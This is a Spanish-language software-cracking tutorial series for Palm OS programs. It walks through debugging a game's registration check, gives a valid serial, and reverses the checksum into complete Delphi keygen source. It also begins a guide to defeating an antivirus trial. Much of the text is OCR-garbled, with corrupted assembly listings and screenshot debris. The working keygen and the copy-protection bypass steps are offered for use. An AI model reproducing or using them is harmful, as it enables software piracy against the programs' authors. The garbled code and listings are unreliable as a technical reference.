nos metemos de cabeza en el listado vivo. Y tras pensar mucho, decidí hacerlo con el Southdebugger y 
partiendo de un dato que es cierto: nuestro fake se tiene que leer en algún momento. Vamos allá. 

El Southdebugger debe tener activadas las siguientes ventanas para ser cómodo: 


ns A 
Ce 


IA Contenido registros 


2 rata ia ban do ra 


POCPELAS HO EL 


Os he señalado las ventanas que no usamos en la anterior lección, ya que las otras las conocéis y los botones 
de ejecución también. 

Nos vamos al Emulador de Palm y nos situamos en lo que sería el equivalente al escritorio. En 

ese momento el debugger se pone en verde (observad el botón de arriba a la derecha del debugger). Nos 
metemos en la ventana de breakpoint, segunda pestaña (trap breakpoint), en el botón de los tres puntos y 
pulsamos ahí como señalé en el tutorial anterior. Vamos a escoger SysTrapFldGetTextPtr. Con teclear 
FldGetTextPtr en el cuadro de arriba ya nos lo encuentra: 


AA PEF A ETE 
ALO] eya Trap br Y irme rs Dra? + cd o 


ea dt 


IT AE 
ALEC] rua Trapo Timur 
IALED| caca Tr rg als y 
[ALEM] eya caprino ¡ads 
LALZWL yo Pra bo Vale roy 
111301 ryaTripbrela rat O01El mar 
[A131] cyaT rap Er cars Ep y 
LALDE] ryrTrep trat hrs 
E AAA 
14134) ¿yatragI Laia 
ALTE] eyaTrarTillir aa le 
1141361 syaTrapTl4dirare Tia ld 
14437] eryatTcaprial asoma y 


ALTO] ryaTrapTaa 
111051 
a ¡UsES 
di 18 sr Te apt ber e re 


lo selecciona en azul. Le damos a “set” y ya tenemos el anzuelo listo. Ya sólo resta darle a Go en los 
botones de arriba (el primero de la izquierda, o F5 si nos resulta más cómodo). Eso nos devuelve el control 
sobre el emulador. Volvemos al programa-objetivo y de nuevo introducimos un serial como vimos, le 
damos a Register (nota, para esta primera prueba meted, por ejemplo, 123456789 como s/n, así me podéis 
seguir bien...). 

¡Pumba!. Aparecemos en el debugger, justo antes de esa llamada a api. Os voy a explicar lo que 

hice en esta fase. Como no tenía nada pero nada claro en que parte del listado muerto estaba lo que me 
interesaba, decidí seguir el proceso por listado vivo a fin de ver en qué parte del código nos estábamos 
moviendo. Quizá esta parte sea más cómoda hacerla con el PalmDebugger ya que con un il nos permite 
ver varias líneas de las que a continuación se van a ejecutar, pero el South también nos vale. Apuntamos 
en un papel las partes del código para luego mirarlo con calma (el lápiz y papel, esos viejos amigos tan 
necesarios en crack y tan olvidados ¿por qué nunca se incluyen como herramientas si siempre los usamos?... 
qué injusto es esto de la informática...) XD 


00000314 4e4fa139 sysTrapFldGetTextPtr 


pues es ahí, en el code0003.bin.s donde nos damos de bruces. Si seguimos el traceo, llegamos a 0000032a 
que nos hace saltar hasta la Label 31 (L31) en 00000348, habiendo un BRA hasta L32 en 00000350. Una 
vez ahí ¡¡mi madre!! ¿qué ha pasado?... esto es lo que nos aparece: 


0000035c 4eadf9ca  L32 JSR -1590(A5) 


¡esto es nuevo también!, un salto a una subrutina que está en una dirección dinámica, precisamente en aS- 
1590 (hexa). Nunca lo habíamos visto antes ¿cierto?. Santo Dios, qué negro se pone todo00000000... pero 
como no nos queda más remedio que seguir traceando, lo hacemos, aunque reconocemos que ya no sabemos 
muy bien en qué parte del código estamos... Si usásemos herramientas combinadas, esta parte del 

crack sería mejor hacerla con el PalmDebugger, ya que llegados a este punto, tiramos un il y vemos que 

unas líneas abajo nos aparece un SysTrapStrCopy. Si buscamos esa cadena en los codes y vamos comparando 
el código del listado vivo con el del muerto, nos encontramos que lo tenemos en ¡¡el code0001. 

bin.s!!. 


ESTO SI QUE ES BUENO. Recapitulando: 

- uno: tenemos un lote de codes, que no nos había ocurrido nunca. 

- dos: la señal de alert no está nada clara. 

- tres: una dirección dinámica nos mete en una subrutina que no está en code0003 sino en el 0001, 
en concreto en la línea 00005844, 

¿Era o no era cierto cuando os dije que este crack era distinto?. Estamos en el laberinto del desierto: 
no tenemos referencias, y eso es lo mejor para perderse. Si algún día protegéis programas, recordad 


la regla de oro: no deis ningún dato que proporcione pistas. Una referencia es suficiente para un cracker 
(en este caso la referencia va a ser el debugger, como estamos viendo). 

Ok. Seguimos traceando hasta 0000586a donde nos salta a L1048 (estamos en el code0001, no lo 
olvidéis), que termina en 0000588e. Ahí hay un RTS que el PalmDebugger nos señala a una dirección 
ilegal, y que en realidad nos lleva de cabecita a 0OOD0OS6d2 (y que averigiié igual que antes, con un il en el 
PalmDebugger [que no en Southdebugger] y observando un SysTrapMemsSet que se coincide con el 
código muerto de la línea 000056d2). Ese trocito de código acaba en 000056f8 con un RTS que nos hace 
aparecer en L1050. En 0000589e un salto nos tira en la L1052 que finaliza en 000058be con un RTS 
ilegal (de nuevo, lo que hicimos antes para seguir) que lleva a 00005720. De ahí a 0000573c, a L1039, a 
0000575c, a L1047, a 00005842, que conduce a L1054. 


Seguimos hasta 000058ca, L1055, 000058d6, 

L1056, 000058e2, L1061, 0000592e, L1057, 000058f8 y L1059. El BRA de 0000591e nos dispara a 
L1077, con un UNLK en 00005490 que nos deja DE NUEVO en el code0003 en 00000360. El salto de 
00000368 nos pone de patitas en el mensaje de Bad Boy que se carga en L35. 

Como me doy cuenta de que os habéis perdido, os pongo aquí un resumen de todo el proceso de 
traceo, que mi tiempo me llevó: 


EN (CEE0003 

00000314 4e4f al39 sysTraprFl dGet Text Ptr 
Ed 

0000032a 661c BNE L31 

00000348 42a7 L31 LR L -(A7) 

[escsce] 

00000350 600a BRA L32 

0000035c 4eadf 9ca L32 J SR - 1590(45) 
por nedio de un J WP 

EN CCHE0OO1 

00005844. 4e560000 LI NK 26, +0 

lave] 

00005862 6710 BEQ L1048 

0000587c 486dedf a L1048 PEA - 4614( A5) 
[ssl] 

0000588e 4e75 RTS 

000056d2 4e560000 LI NK 26, +0 

sa] 

000056f 8 4e75 RTS 

00005890 584f L1050 ALDQ W+4, A7 
[ea] 

0000589e 6608 BNE L1052 

000058a8 2f0b L1052 MOVE L AS, - (A7) 
Loc] 

000058be 4e75 RTS 

00005720 4e56ff e4 LI NK 26, +£ 28 
[ea] 

0000573c 6f 08 BLE L1039 

00005746 2f0c L1039 ME L 44, - (A7) 
[isa:¿2] 

0000575c 600000de BRA L1047 
0000583c 4cdf 1cf8 L1047 MOVEM L (A7) + CB- D// A2- M 
Paz] 

00005842 4e75 RTS 

000058c0 3600 L1054 MOVE. WDOD, EB 


[Esija] 

O00058ca 6608 BNE L1055 

00005804 4243 L1055 TST. WEB 
000058d6 6606 BNE L1056 

000058de 7200 L1056 MIEQ +0, Ob 
000058€e0 7c00 MIVEQ +0, Do 

000058e2 6040 BRA L1061 

00005924 2f0a L1061 ME. L Aj, - (A7) 


[za] 

0000592e 65b4 BCS L1057 

000058e4 16326000 L1057 MOVE. B 0(A2, D6. VW, CB 
Lead 

000058f 8 6520 BCS L1059 

[isc] 

000059la 303c800b L1059 MOVE. W+* 32757! - $7ff 5, DO 
000059l1e 6000016c BRA L1077 

00005a8c 4cdf Ocf8 L1077 MIVEM L (47) + CB- D7/ A2/ A3 
00005290 4e5e UNLK A6 

EN (CEE0003 

00000360 4f ef 000c LEA 12(A7), A7 

00000364 0440800b SUBI. W+* 32757! - $7ff 5, DO 
00000368 6728 BEQ L35 

00000392 2f 3c1bbc044c L35 MIE. L 4653060700! $1bbc044c, - (A7) 
00000398 600a BRA L36 


Bueno, soy consciente de que de mucho no os habéis enterado, pero supongo que todo esto forma parte de la estrategia 
del programador para perdernos. La protección se las promete divertida ¿o no?. 

Ahora que por fin, gracias al debuggeo, hemos logrado saber qué camino recorre el mensajito malo y nuestro serial, 
vamos a seguir de nuevo la historia pero abreviando un poco. Nos metemos en el Southdebugger y ponemos un SysTrap 
en DIKGetSyncInfo, que cae aproximadamente en el code0001 .bin.s en 000056f2. Mi deducción fue: “Ummm si 
primero lee mi fake serial y luego hace llamada a HotSync, es que aquí hay un keygen” y sí, no iba desencaminado. 

Ni cortos ni perezosos y fieles a nuestro Zen Palm Cracking, metemos ese breakpoint y llegamos a este trozo de código: 


O00056f 2 4e4f a2a9 sysTrapOl kGet Syncl nfo; lo pasanos con F7 en el South 
000056f 6 4e5e UNLK A6 

O00056f 8 4e75 RTS; que nos lleva a la Label 1050 

00005890 584f L1050 ADDQ W+4, A7; corrige la pila 

00005892 486dedfa L1051 PEA - 4614( 45); m nonbre de Hot Sync 

00005896 4e4f a0c7 sysTrapStrLen; mde HotSync y nete tanaño en hexa en DO 
0000589a 4240 TST. WED0; conprueba si tanaño es ¡gual a O 

000O58%c 584f ALDQ W4, A7; corrige la pila (A7) 

0000589e 6608 BNE L1052; cono no es O, branch ¡if not equal 

000058a8 2f0b L1052 MOVE L AS, - (A7) 

000058aa 486dedfa PEA - 4614( A5); pushea m otSync 

000058ae 2f0a MVE L A?, -(A7); m fake pasa ala pila 

000058b0 4872000e PEA L1054 

000058b4 48720004 PEA L1053; esta Label no existe ¿qué pi nta entonces? 
000058b8 O697fffffe66 ACT. L + 410! - $19a, (A7) 

000058be 4e75 RTS 

00005720 4e56ff e4 LI NK 26, +£ 28 

00005724 48e71f 38 MOVEM L CB- D7/ 42-24, -(A7); típico al ¡nicio subruti na 
00005728 286e0008 MEA L 8(46),/4; m fake pasa a M 

0000572c 246e000c MEA L 12(46), A2; m FotSync a A2 


00005730 1614 MVE B (44), 13; ler byte de m fake a [3 

00005732 0cO30030 CWPI. B +48! $30, ['B; lo compara con O ASA | 

00005736 6d06 BLT L1038; no sal ta 

00005738 0c030039 CWPI. B +57! $39, PB; lo compara a 9 ASA | 

0000573c 6f 08 BLE L1039; branch if less or equal (sólo números en s/n) 

Nota: vemos en esto último que comprueba que el primer byte de nuestro fake sea un carácter numérico 
00005746 2f0c L1039 ME L 44, - (A7); m fake pasa a la pila 

00005748 4e4faOce sysTrapStrATol; lo convierte en íntegro en hexa en DO 
0000574c 2640 MEA L DD, 43; lo pasa a A3 

0000574e b7f cOODO10000 CWPA L 65536! $10000, A3; ¡conpara con 65536! 
00005754 584f ALDQ W+*4, A7; corrige la pila 

00005756 6f 08 BLE L1040; branch ¡f less or equal 


¿Cómo?, ¿qué es eso de la línea 0000574e?... me convierte mi fake en hexa y lo compara a ese valor. Ummm, 
vamos a probar algo. Le damos a Go en el Southdebugger y ponemos al emulador en el equivalente al escritorio de 
Windows, es decir, el Launcher de Palm. Desactivamos el breakpoint y volvemos a entrar en el programa poniendo por 
número 65537. El mensaje de error ¡¡es diferente a si ponemos 65536!! Así que el camino es diferente si el número es 
diferente... esto nos recuerda a lo que vimos antes, si no lo olvidasteis, cuando decíamos “con 6 o más dígitos el 
mensaje de alerta es diferente” pues ahora lo matizamos: el mensaje cambia si el número es igual o inferior a 65536 (no 
quiero ni imaginarme qué significará ese número en la vida del programador... es que son tan previsibles...). Bueno, 
bueno, bueno, esto atisba un poco de luz ¿verdad?. Volvamos al debugger con breakpoint en DIKGetSyncInfo, entramos 
en el programa y por serial metemos como fake 65536, para que se produzca el salto de 00005756. En el momento que 
realice el debugger el breakpoint, seguimos con F8 y F7 (FS es paso a paso y F7 salta un proceso de golpe) hasta 


00005756 6f08 BLE L1040 
y con gran sorpresa y gratificación, vemos cómo con este nuevo numerito fake sí salta... 


5- ¿Es eso un Oasis?: 
Aunque el camino ya es bueno, eso no evita otro pequeño mareo de código, en concreto, con la 
L1040 nos encontramos esto: 


00005760 2f0a L1040 MODE L A?, - (A7) 
00005762 4e4f a0c7 sysTrapSt r Len 
00005766 0c40000a CWPI . W+40! $a, DO 
0000576a 584f ALDQ W+4, A7 
0000576c 6336 BLS L1041 
0000576e 48780005 PEA $0005. W 
00005772 2f0a MIE. L A?, - (A7) 
00005774. 486efff 4 PEA - 12(46) 
00005778 4e4f a026 sysTr apMenMbve 
0000577c 2f0a MOVE. L A?, - (A7) 
0000577e 4e4f a0c7 sysTrapSt r Len 
00005782 0640fffb ADO. W+E 5, DO 
00005786 3600 MOVE. WDO, [8 
00005788 48780005 PEA $0005. W 
0000578c 48723000 PEA 0(A2, CB. VW 
00005790 486efff9 PEA - 7(A6) 
00005794 4e4f a026 sysTr apMenMbve 
00005798 422efffe CLR B - 2(46) 
0000579%c 7e0a MIVEQ +40, D/ 
000057%e 4fefO0lc LEA 28(A7), A7 
000057a2 6016 BRA L1042 


00005724 2f0a L1041 ME L A?, - (A7) 
00005726 4e4f a0c7 sysTrapSt r Len 
000057aa 3e00 MOVE. WDO, D7 
000057ac 2f0a MIDE. L A?, - (A7) 
000057ae 486efff 4 PEA - 12( 46) 
000057b2 4e4f a0c5 sysTrapStr Copy 
000057b6 4fef000c LEA 12(A7), A7 
000057ba 7800 L1042 MIVEQ +0, DA 
000057bc 7600 MIVEQ +0, 1B 
000057be 6048 BRA L1044 
000057c0 7000 L1043 MDEQ +0, DO 
000057c2 3003 MOVE. WEB, DO 
000057c4 4leefff 4 LEA - 12(46), AD 
000057c8 7200 MWVEO +0, [5 
000057ca 1a300800 MOVE. B O(AD, DO. L), [5 
000057ce e248 LSR W+A, DD 
00005700 d040 ADD WDO0, DO 
000057d2 3c00 MOVE. WDO, D6 
00005704 bc43 (WP. WEB, D6 
000057d6 56c0 SNE DO 

000057d8 4400 NEGB DO 

000057da 4880 EXT. WDO 

000057dc cOc5 MULU WEB, DO 
000057de bc43 (WP. WEB, D6 
000057€e0 57c1 SEQ DL 

000057e2 4401 NEGB Dl 
000057e4 4881 EXT. WDOL 

000057€e6 c2c5 MLU WEB, DL 
000057€e8 3403 MOVE. WEB, [2 
000057ea 5242 ALDQ W+A, [2 
000057ec c4c1 MLU WODIL, P2 
000057ee (440 ALDO WDD, P2 
000057f O c4f cODO7 MILU W+7, IP 
000057f 4 4243 TST. WEB 

000057f 6 57c0 SEQ DO 

000057f 8 4400 NEGB DO 

000057f a 4880 EXT. WDO 

000057f c cOf cO19d MULU W+413! $19d, DO 
00005800 d042 ALDO WP?, DO 
00005802 d044 ALDO WDX4, DO 
00005804 3800 MOVE. WDO, D4 
00005806 5243 ALDQ WA, OB 
00005808 b647 L1044 (WP. WD7, PB 
0000580a 65b4 BCS L1043 
0000580c 200b MOVE. L 43, DO 
0000580e b840 CWP. WOOD, D4 
00005810 6626 BNE L1046 
00005812 4aae0010 TST. L 16( 46) 
00005816 671c BEQ L1045 
00005818 7000 MXVEQ +0, DO 
000058la 3004 MOVE. WD4, DO 
0000581c 2f00 MIDE. L DO, - (A7) 
000058le 486eff e4 PEA - 28( A6) 


00005822 4e4f a0c9 sysTrapStrl ToA 

00005826 504f ALDQ W+8, A7 

00005828 2f08 ME. L AD, - (A7) 

0000582a 2f 2e0010 MOVE. L 16(46), - (A7) 

0000582e 4e4f aOc5 sysTrapsStrCopy 

00005832 504f ALDQ W+8, A7 

00005834 7000 L1045 MIEQ +0, DO 

00005836 6004 BRA L1047 

00005838 303c800c L1046 MOVE. W+ 32756! - $7ff 4, DO 
0000583c 4cdf 1cf8 L1047 MEM L (A7) + CB- D// A2- 44 
00005840 4e5e UN.K A6 

00005842 4e75 RTS 


Esto no es más ni menos que lo que debemos estudiar para hacer un buen keygen, sin embargo, prefiero dejarlo de 
momento para un Anexo a este tutorial y así lo miramos con más calma. De momento lo que nos interesa de todo esto 
es la línea 0000580e, donde se compara DO (mi fake) con D4 (el serial bueno). Llegados a este punto, si miramos en la 
ventana de datos lo que contiene D4, veremos que para X-Grimator pone 21427 (decimal), que efectivamente, una vez 
introducido nos registra el programa. 

Pues sí, es un oasis donde nuestra sed se aplaca y al fin sacamos el dichoso serial para nuestro HotSync. Nos queda 
pendiente de todos modos lo del keygen... 


6- Finiquitado: 

Con esto llegamos al final del tutorial. Reconozco que este programa me ha gustado especialmente ya que al principio 
me volvía loco con sus cinco codes, con la imposibilidad de acceder con ninguna SysTrap mediante listado muerto etc, 
etc... es una pena que el buen hombre del programador metiese la línea que comparaba el fake con el famoso 65536 
(10.000 hexa), fue una pista suficiente para que avezados crackers como nosotros pudiésemos abrirnos camino. 

Pues bien, no quiero dejaros por esta vez sin dedicarle este tutorial a Carpathia, aunque no entienda mi idioma, por esa 
pasión que le lleva a seguir programando herramientas cracker y confiando que siga así él y muchos como él. Y por 
supuesto, mi enhorabuena de nuevo al genio de S-P-A-R-K, que se tiene muy merecido la sección que le confiaron. Fijo 
que con él aprenderéis más que conmigo ; 


0) Lo prometido es deuda y os debo un anexo de keygen. 
X-Grimator 

En algún lugar de Europa, 18/07/02 

“Pensad, pensad... siempre pensad”. 
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INTRODUCCION 
ANEXO A LA LECCIÓN 6 


AL ATAQUE 


Tal y como habíamos quedado en la última entrega, se hace necesario un estudio somero de la 

rutina de chequeo para generar un serial bueno y poder registrar así nuestro programa. Esto sería un crack 
“limpio”, un crack que implica conocimiento y natural al programa, no como los parches, que son cracks 
“sucios”, muy buenos cuando se empieza pero insuficientes cuando ya se tiene algo de nivel. 

El código al que habíamos llegado era éste: 


00005760 2f0a L1040  MOVELL A2,-(A7); carga HotSync en la pila. El fake, en A3 

00005762 4e4fa0c7 sysTrapStrLen; calcula tamaño de mi HotSync y lo mete en DO en hexa 
00005766 0c40000a CMPI.W ++10!$a,DO0; compara el tamaño de HotSync con 10 

0000576a 584f ADDQ.W?+t4,A7; corrige la pila 

0000576c 6336 BLS L1041; salta, ya que X-Grimator mide 10 (branch less or same) 


Este trozo de código es si el HotSync es superior a 10 caracteres 


0000576e 48780005 PEA $0005.W 
00005772 2f0a MOVE,L A2,-(A7) 
00005774 486efff4 PEA -12(A6) 
00005778 4e4fa026  sysTrapMemMove 
0000577c 2f0a MOVE,L A2,-(A7) 
0000577e 4e4fa0c7 sysTrapStrLen 
00005782 0640fffb ADDI.W +-5,DO 


00005786 3600 MOVE.W DO0,D3 
00005788 48780005 PEA $0005.W 
0000578c 48723000 PEA 0(A2,D3.W) 
00005790 486efff9 PEA -7(A6) 
00005794 4e4fa026 sysTrapMemMove 
00005798 422efffe CLR.B -2(A6) 


0000579c 7e0a MOVEQ +10,D7 
0000579e 4fef001c LEA 28(A7),A7 
00005722 6016 BRA L1042 


00005744 2f0a L1041 MOVE.L A2,-(A7); mi HotSync pasa a la pila 
00005746 4e4fa0c7 sysTrapStrLen; en DO se mete el tamaño calculado de mi HotSync, en hexa 
000057aa 3800 MOVE.WDO0,D7; DO pasa a D7 en el último word (xxxx0010 en mi caso) 
000057ac 2f0a MOVE.L A2,-(A7); HotSync pasa a la pila 
000057ae 486efff4 PEA -12(A6) 
000057b2 4e4fa0c5 sysTrapStrCopy; HotSync se mete en DO en valor ASCII (Así, para el Hot 
Sync “Az”, sería 41 [que es A] 7A [que es z]) 
000057b6 4fef000c LEA 12(A7),A7 
000057ba 7800 L1042 MOVEQ +0,D4; D4 se pone a cero. Es el contador del número de letras que componen 
nuestro HotSyne 
000057bc 7600 MOVEQ +0,D3; se pone a cero el contador de cada letra, que es D3 
000057be 6048 BRA L1044 
00005808 b647 L1044 CMP.WD7,D3; mira si la letra que analiza el conta dor D3 es igual al número total de letras de 
mi HotSync. Así, cuando D3 calcule la letra 10, coincidirá con la de D7 y acabará el checksum 


0000580a 65b4 BCS L1043; salta mientres queden letras que analizar 

000057c0 7000 L1043  MOVEQ +0,D0; pone DO a cero 

00005702 3003 MOVE.WD3,D0; D3 marca cero en la primera letra, uno en la segunda y lo pasa DO 
00005704 41eefff4 LEA -12(A6),A0 

00005708 7a00 MOVEQ +0,D5; pone DS a cero 


000057ca 14300800 MOVE.B 0(A0,DO.L),D5; en DS se mete el valor ASCII de mi primera le- 

tra del HotSync conforme vimos en línea 57b2 
000057ce e248 LSR.W +*1,D0; los bits de DO los desplaza un puesto a la derecha en 

binario. Si se “cayó” un bit uno, activa el flag Zero. Así, 
si tenemos en DO=00000002(hexa) pasaría a ser 00000001 binario, ya que 2 hexa es 10 binario, y el flag no se activa ya 
que lo que se “cayó” fue un cero. Esta instrucción permite desplazar de uno a ocho bits (+*1 para uno, +2 para dos...) 
00005740 d040 ADD.W DO,DO; DO+DO y lo guarda en DO 
000057d2 3c00 MOVE. VIO, D6; DO pasa a D6 
00005704 bc43 CWP. WEB, D6; compara [B con D6. De no ser ¡gual, DO pasa a ser FF 
de ser ¡gual, DO se convierte en 00 
000057d6 56c0 SNE DO 
00005708 4400 NEGB DO; O-DO (1 bit) y lo guarda en DO 
000057da 4880 EXT. WDO 
Segunda parte del cálculo, cono veis, no es nay diferente la estructura a la pri nera 
000057dc cOc5 MULU WIb, DD; Eb por DO y lo guarda en DO 
000057de bc43 CWP. WEB, D6; conpara [B con D6 y de ser ¡gual, Dl pasa a ser FF. En 
caso contrario, Dl pasa a ser 00 
000057€e0 57c1 SEQ DL 
000057e2 4401 NEGB Dl; O-Dl (un bit) y lo guarda en Dl 
000057e4 4881 EXT. WDL 
Tercera parte del cál cul o, como veis, no es muy diferente la estructura a la segunda 
000057e6 c2c5 MILU WIb, Dl; D5 por D1 y lo guarda en D1 
000057€e8 3403 MIE. WIB, [P; mueve D3 y lo pone en D2 
000057ea 5242 ADDQ WWA, PP; suma uno a D2 y lo guarda en D2 
000057ec c4c1 MLU VID, PP; multiplica D1 por D2 y lo guarda en D2 


000057ee 0440 ALO WDOD, [P?; suma DO a D2 y lo guarda en D2 

000057f 0 c4f c0007 MULU WW7, PP; multiplica D2 por siete y lo guarda en D2 

000057f 4 4243 TST. WEB; compara D3 con cero. De ser igual, DO pasa a ser FF. En 

caso contrario, DO se pone como 00 

000057f 6 57c0 SEQ DO 

000057f 8 4400 NEG B DD; 0-DO (1 bit) y lo guarda en DO 

000057f a 4880 EXT. WED 

Tercera parte del cálculo, como veis, no es muy diferente la estructura a la segunda 
000057fc cO0fc019d MULU.W+t413!$19d,DO; DO multiplicado por 413 (decimal) y guardado en 
DO 

00005800 d042 ADD WEP?, DO; DO nás [2 y lo guarda en DO 

00005802 d044 ADD WD, DO; DA nás DO y lo guarda en DO. Suna el cálculo de la letra 
anterior al de ésta. 

00005804 3800 MOVE. VWIZO, D4; DO pasa a D1. Este es el serial total de las letras que |le- 
venos anal ¡ zadas. 

00005806 5243 ADDQ WWA, 3; suna el contador [B a uno 

00005808 b647 L1044 (WP. VD7, PB; vuel ve a conparar los contadores 

0000580a 65b4 BCS L1043; si faltan letras, | oopea y vuel ve al checksum 

0000580c 200b MOVE. L 43, DO 

0000580e b840 CWP. WDO, D4; en DA está el serial correcto y en DD m fake 


Pues así es. Os he detallado paso a paso qué hace el programa para que podáis hacer un keygen 
con vuestra herramienta favorita de programación. Yo voy de cabeza a hacer el mío en Delphi, así aprendo 
a programar en Delphi ;0). 


Un abrazo. 
X-Grimator 
U.E. 20/07/02 
“Pensad, pensad...siempre pensad” 
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Palm CRACKER: X-Grimator FECHA: W/31/02/2005 


INTRODUCCION 
ANEXO IL A LA LECCIÓN 6 


AL ATAQUE 


En este pequeñísimo anexo apenas os voy a contar un par de detalles importantes que observé en el programa y que 
pueden ser de especial utilidad. 


1: En primer lugar, ¿recordáis esta parte del código tan rara?: 
0000574e b7fc00010000 CMPA.L +65536!$10000,A3 


pues efectivamente, el 65536 (10000 hexa) es el tamaño de un segmento (64k) y también una variable de 
tipo Word para Delphi (ese valor sería el máximo que tomaría). 


2: En segundo lugar, anunciaros que ha vuelto Latigo en http://latigo.cjb.net, que tiene una buena sección 
de Palm Reversing. También tenemos mucho en la web de Quequero, que ha regresado y Carpathia avanza 
con su PalmDeMon. 


3: En tercer lugar, señalaros que lo que ocurría en el otro tutorial (el salto de códigos de listado muerto al 
debuggear) se llama “cargar dinámicamente una dirección de memoria”. Bueno, y nada más. Os adjunto un keygen que 
hice en Delphi con los fuentes, que siempre creí profundamente en el GPL. Ahí veréis como sigo paso a paso el listado 
ASM y como he puesto comentarios en lo más enrevesado. Por cierto, que tiene Huevo de Pascua, je, je... Por último, 
señalar que sin las explicaciones de BlackDog nunca podría haber aprendido nada de Delphi. A él le debo haber podido 
hacer el keygen y a él dedico este anexito. 


Europa, 07/08/02 


Code Source KeyGen For Strategic Commander 1.0 "Echo en Delphi 6.0" 


unit Unitl; 


Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, 
Dialogs, jpeg, ExtCtrls, StdCtrls; 


type 

TPpal = class(TForm) 

Foto: Tlmage; 

Saludo: TLabel; 

Autor: TLabel; 

StaticTextl: TStaticText; 

HostSyncEdit: TEdit; 

CodigoEdit: TEdit; 

HotSyncL: TLabel; 

SerialL: TLabel; 

About: TButton; 

procedure HostSyncEditChange(Sender: TObject); 
procedure AboutClick(Sender: TObject); 
procedure FotoDbIClick(Sender: TObject); 
private 

[ Private declarations ) 

public 

[ Public declarations | 

end; 


var 
Ppal: TPpal; 


implementation 
(SR *.dfm) 


procedure TPpal.HostSyncEditChange(Sender: TObject); 

Var 

D0,D1,D2,D3,D4,D5,D6,D7:word;//mejor word que integer para evitar num negat 
Caracter:char; 


D7:=length(HostSyncEdit.text);//número total letras HotSync 

D4:=0; 

D3:=0;//indice (número de letra del HotSync que se analiza) 

while (D3<D7) do//esto comienza índice por cero como primera letra 
begin 

Caracter:=HostSyncEdit.text[D3+1];//analiza letra cero más uno 
D5:=ord(Caracter); 


DO:=D3; 

DO0:=(DO shr 1)*2; 

D6:=DO; 

if D6=D3 then DO:=$0000 else DO:=$FFFF; 
d0:=$0-d0; 

DO0:=D5 * DO; 

if D6=D3 then D1:=$FFFF else D1:=$0000; 
d1:=$0-d1; 

Dl:=DS * Dl; 

D2:=D3+1; 

D2:=D2 * DI: 

D2:=D2 + DO; 

D2:=D2 * 7; 

if D3=0 then DO:=$FFFF else DO:=$0000; 
DO0:=$0-DO; 

DO0:=DO * 413; 

D0:=D2 + DO; 

DO0:=DO0 + D4; 

D4:=DO; 

inc (D3);//incrementa D3 para cerrar bucle 
end; 

CodigoEdit.Text:= IntToStr(D4); //presentacion decimal 


end; 

procedure TPpal.AboutClick(Sender: TObject); 

begin 

ShowMessage('KeyGen hecho por X-Grimator con una buena ayuda y orientación de Blackdog.'++*13+"El programa 
es bajo licencia GPL y pretende ser un ejercicio para el aprendizaje de Programación Creativa.'+++134+++13+'Europa, 
7/08/02); 

end; 


procedure TPpal.FotoDbIClick(Sender: TObject); 

begin 

ShowMessage ("Pedazo Huevo de Pascua acabas de encontrar chaval.'+++13+"Te mereces ponerte en contacto 
conmigo en xgrimator softhome.net'); 

end; 


end. 


Al Compilarlo y ejecutarlo aparece 


Commander 1.0 KeyGen by X-Grimator 


LUCI O 
illa de arriba 


Nombre del HotSync: 


Serial válido: 


er71 
07/08/02 


X-Grimator con ayuda inestimable de Blackdog, UE, 07/08/02 


Si presionamos el botón de About veremos: 


Strategic_Commander_Keygen xl 


KeyGen hecho por <-Grimator con una buena ayuda y orientación de Blackdog. 
El programa es bajo licencia GPL y pretende ser un ejercicio para el aprendizaje de 
Programación Creativa. 


Europa, 7*08/02 


Me podéis localizar en xgrimatorOsofthome.net 
www.disidents.org es donde están mis tutos a vuestra disposición. 


Un abrazo. 
X-Grimator 
U.E. 20/07/02 
“Pensad, pensad...siempre pensad” 
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INTRODUCCION 


O lo ridículo de hacer una protección insultante 


AL ATAQUE 


¡Hola de nuevo, mis pequeños y alocados secuaces!. Bueno, últimamente he estado un poco ausente pero eso fue debido 
al crackme que hice en pre y a un keygen también en formato para Palm, que es que aprender a programar, aunque sea 
un poquito, lleva su tiempo. Así que he decidido escribiros este tuto para ir poco a poco dejándoos alguna lección por 
ahí. 


1- Aburrido estaba yo en ircnet: 

Cuando apareció un pobre chico llamado TaeBo- de Dakota del Sur todo agobiado porque no era capaz de crackear este 
antivirus, y sospechaba que un monstruo horrible y feo se había colado en su pobre Palm a fin de devorarle la codiciada 
estabilidad de su S.O. Tanto era su sufrimiento para crackear el antivirus que decidí ayudarle, así que cogí las 
herramientas de siempre y me puse a mirar... 

Lo primero que hice fue cargar el programa en el Palm Emulator del que tanto os hablé y comprobar sus mensajes. 
Efectivamente, vi que había uno clásico: 


Juas juas, así que un trial... en fin, el crack no podía ser difícil pero como no había escrito nada sobre trials, decidí que 
tenía que escribir uno, así que se me ocurrió adelantar la fecha para ver qué mensaje me salía, y hete aquí que me espeta 
esto a la cara: 


Dios, cómo se puede ser tan previsible... lastimoso esto, de verdad, es que ofende a la inteligencia... :o( 

En fin, ya algo desanimado por lo sencillo del crack y casi deprimido de que una empresa tan seria como debería ser 
una antivirus haga este tipo de protecciones, decidí cargar el programa en el preExplorer y comprobar, como 
efectivamente fue, que el mensaje de “Fin de Trial” era el 1500 decimal (empezaremos a acostumbrarnos a ponerlo 
como ++1500) o lo que es igual, el OS5dc hexa ($05dc). Estupendo. Me hizo gracia ver un mensaje ++1600 ($0640) que te 
daba las gracias por registrarte y que luego no aparecía en ningún lado del código, además, es que ni siquiera aparecía 
una casilla de register, lo que me hizo pensar que el programador es un tío vago (lazy en inglés) que reutilizó trozos de 
código y recauchutó cosas varias... lo cual me da más y más que pensar que este antivirus es de todo menos fiable... 
pedazo chapuza macho. 


Ya no sabía si enfadado o deprimido, utilicé el pilotdis para desensamblar (más cómodo si se usa con el preedit del 
dr_funk, quizá la mejor herramienta de crackeo para Palm ahora mismo en el mercado), en concreto el code0001, que es 
el único interesante (respecto al code0000, es uno estándar en todas las aplicaciones de Palm, y podéis buscar 
información en google, en un texto llamado Prc Format). Así que ya tenemos desensamblado el code y nos disponemos 
a crackear. 


2- Ay, TaeBo-, mon ami...: 

Lo que te llevó a ti, estimado lector, a leer estas líneas, fue más o menos lo que me llevó a mí, pobre newbie, sospechar 
por dónde iban los tiros. Y el bueno del de Dakota del Sur, perdidísimo en código. En fin, abro el code0001.bin.s con el 
notepad (block de notas en lengua no-hereje) y tras buscar el mensaje de “gracias por registrarse” y ver que ni existía, 
busqué el de “caducado como los billetes con los que X -Grimator intenta pagar las cervezas”, o sea, la Talt ++1500 
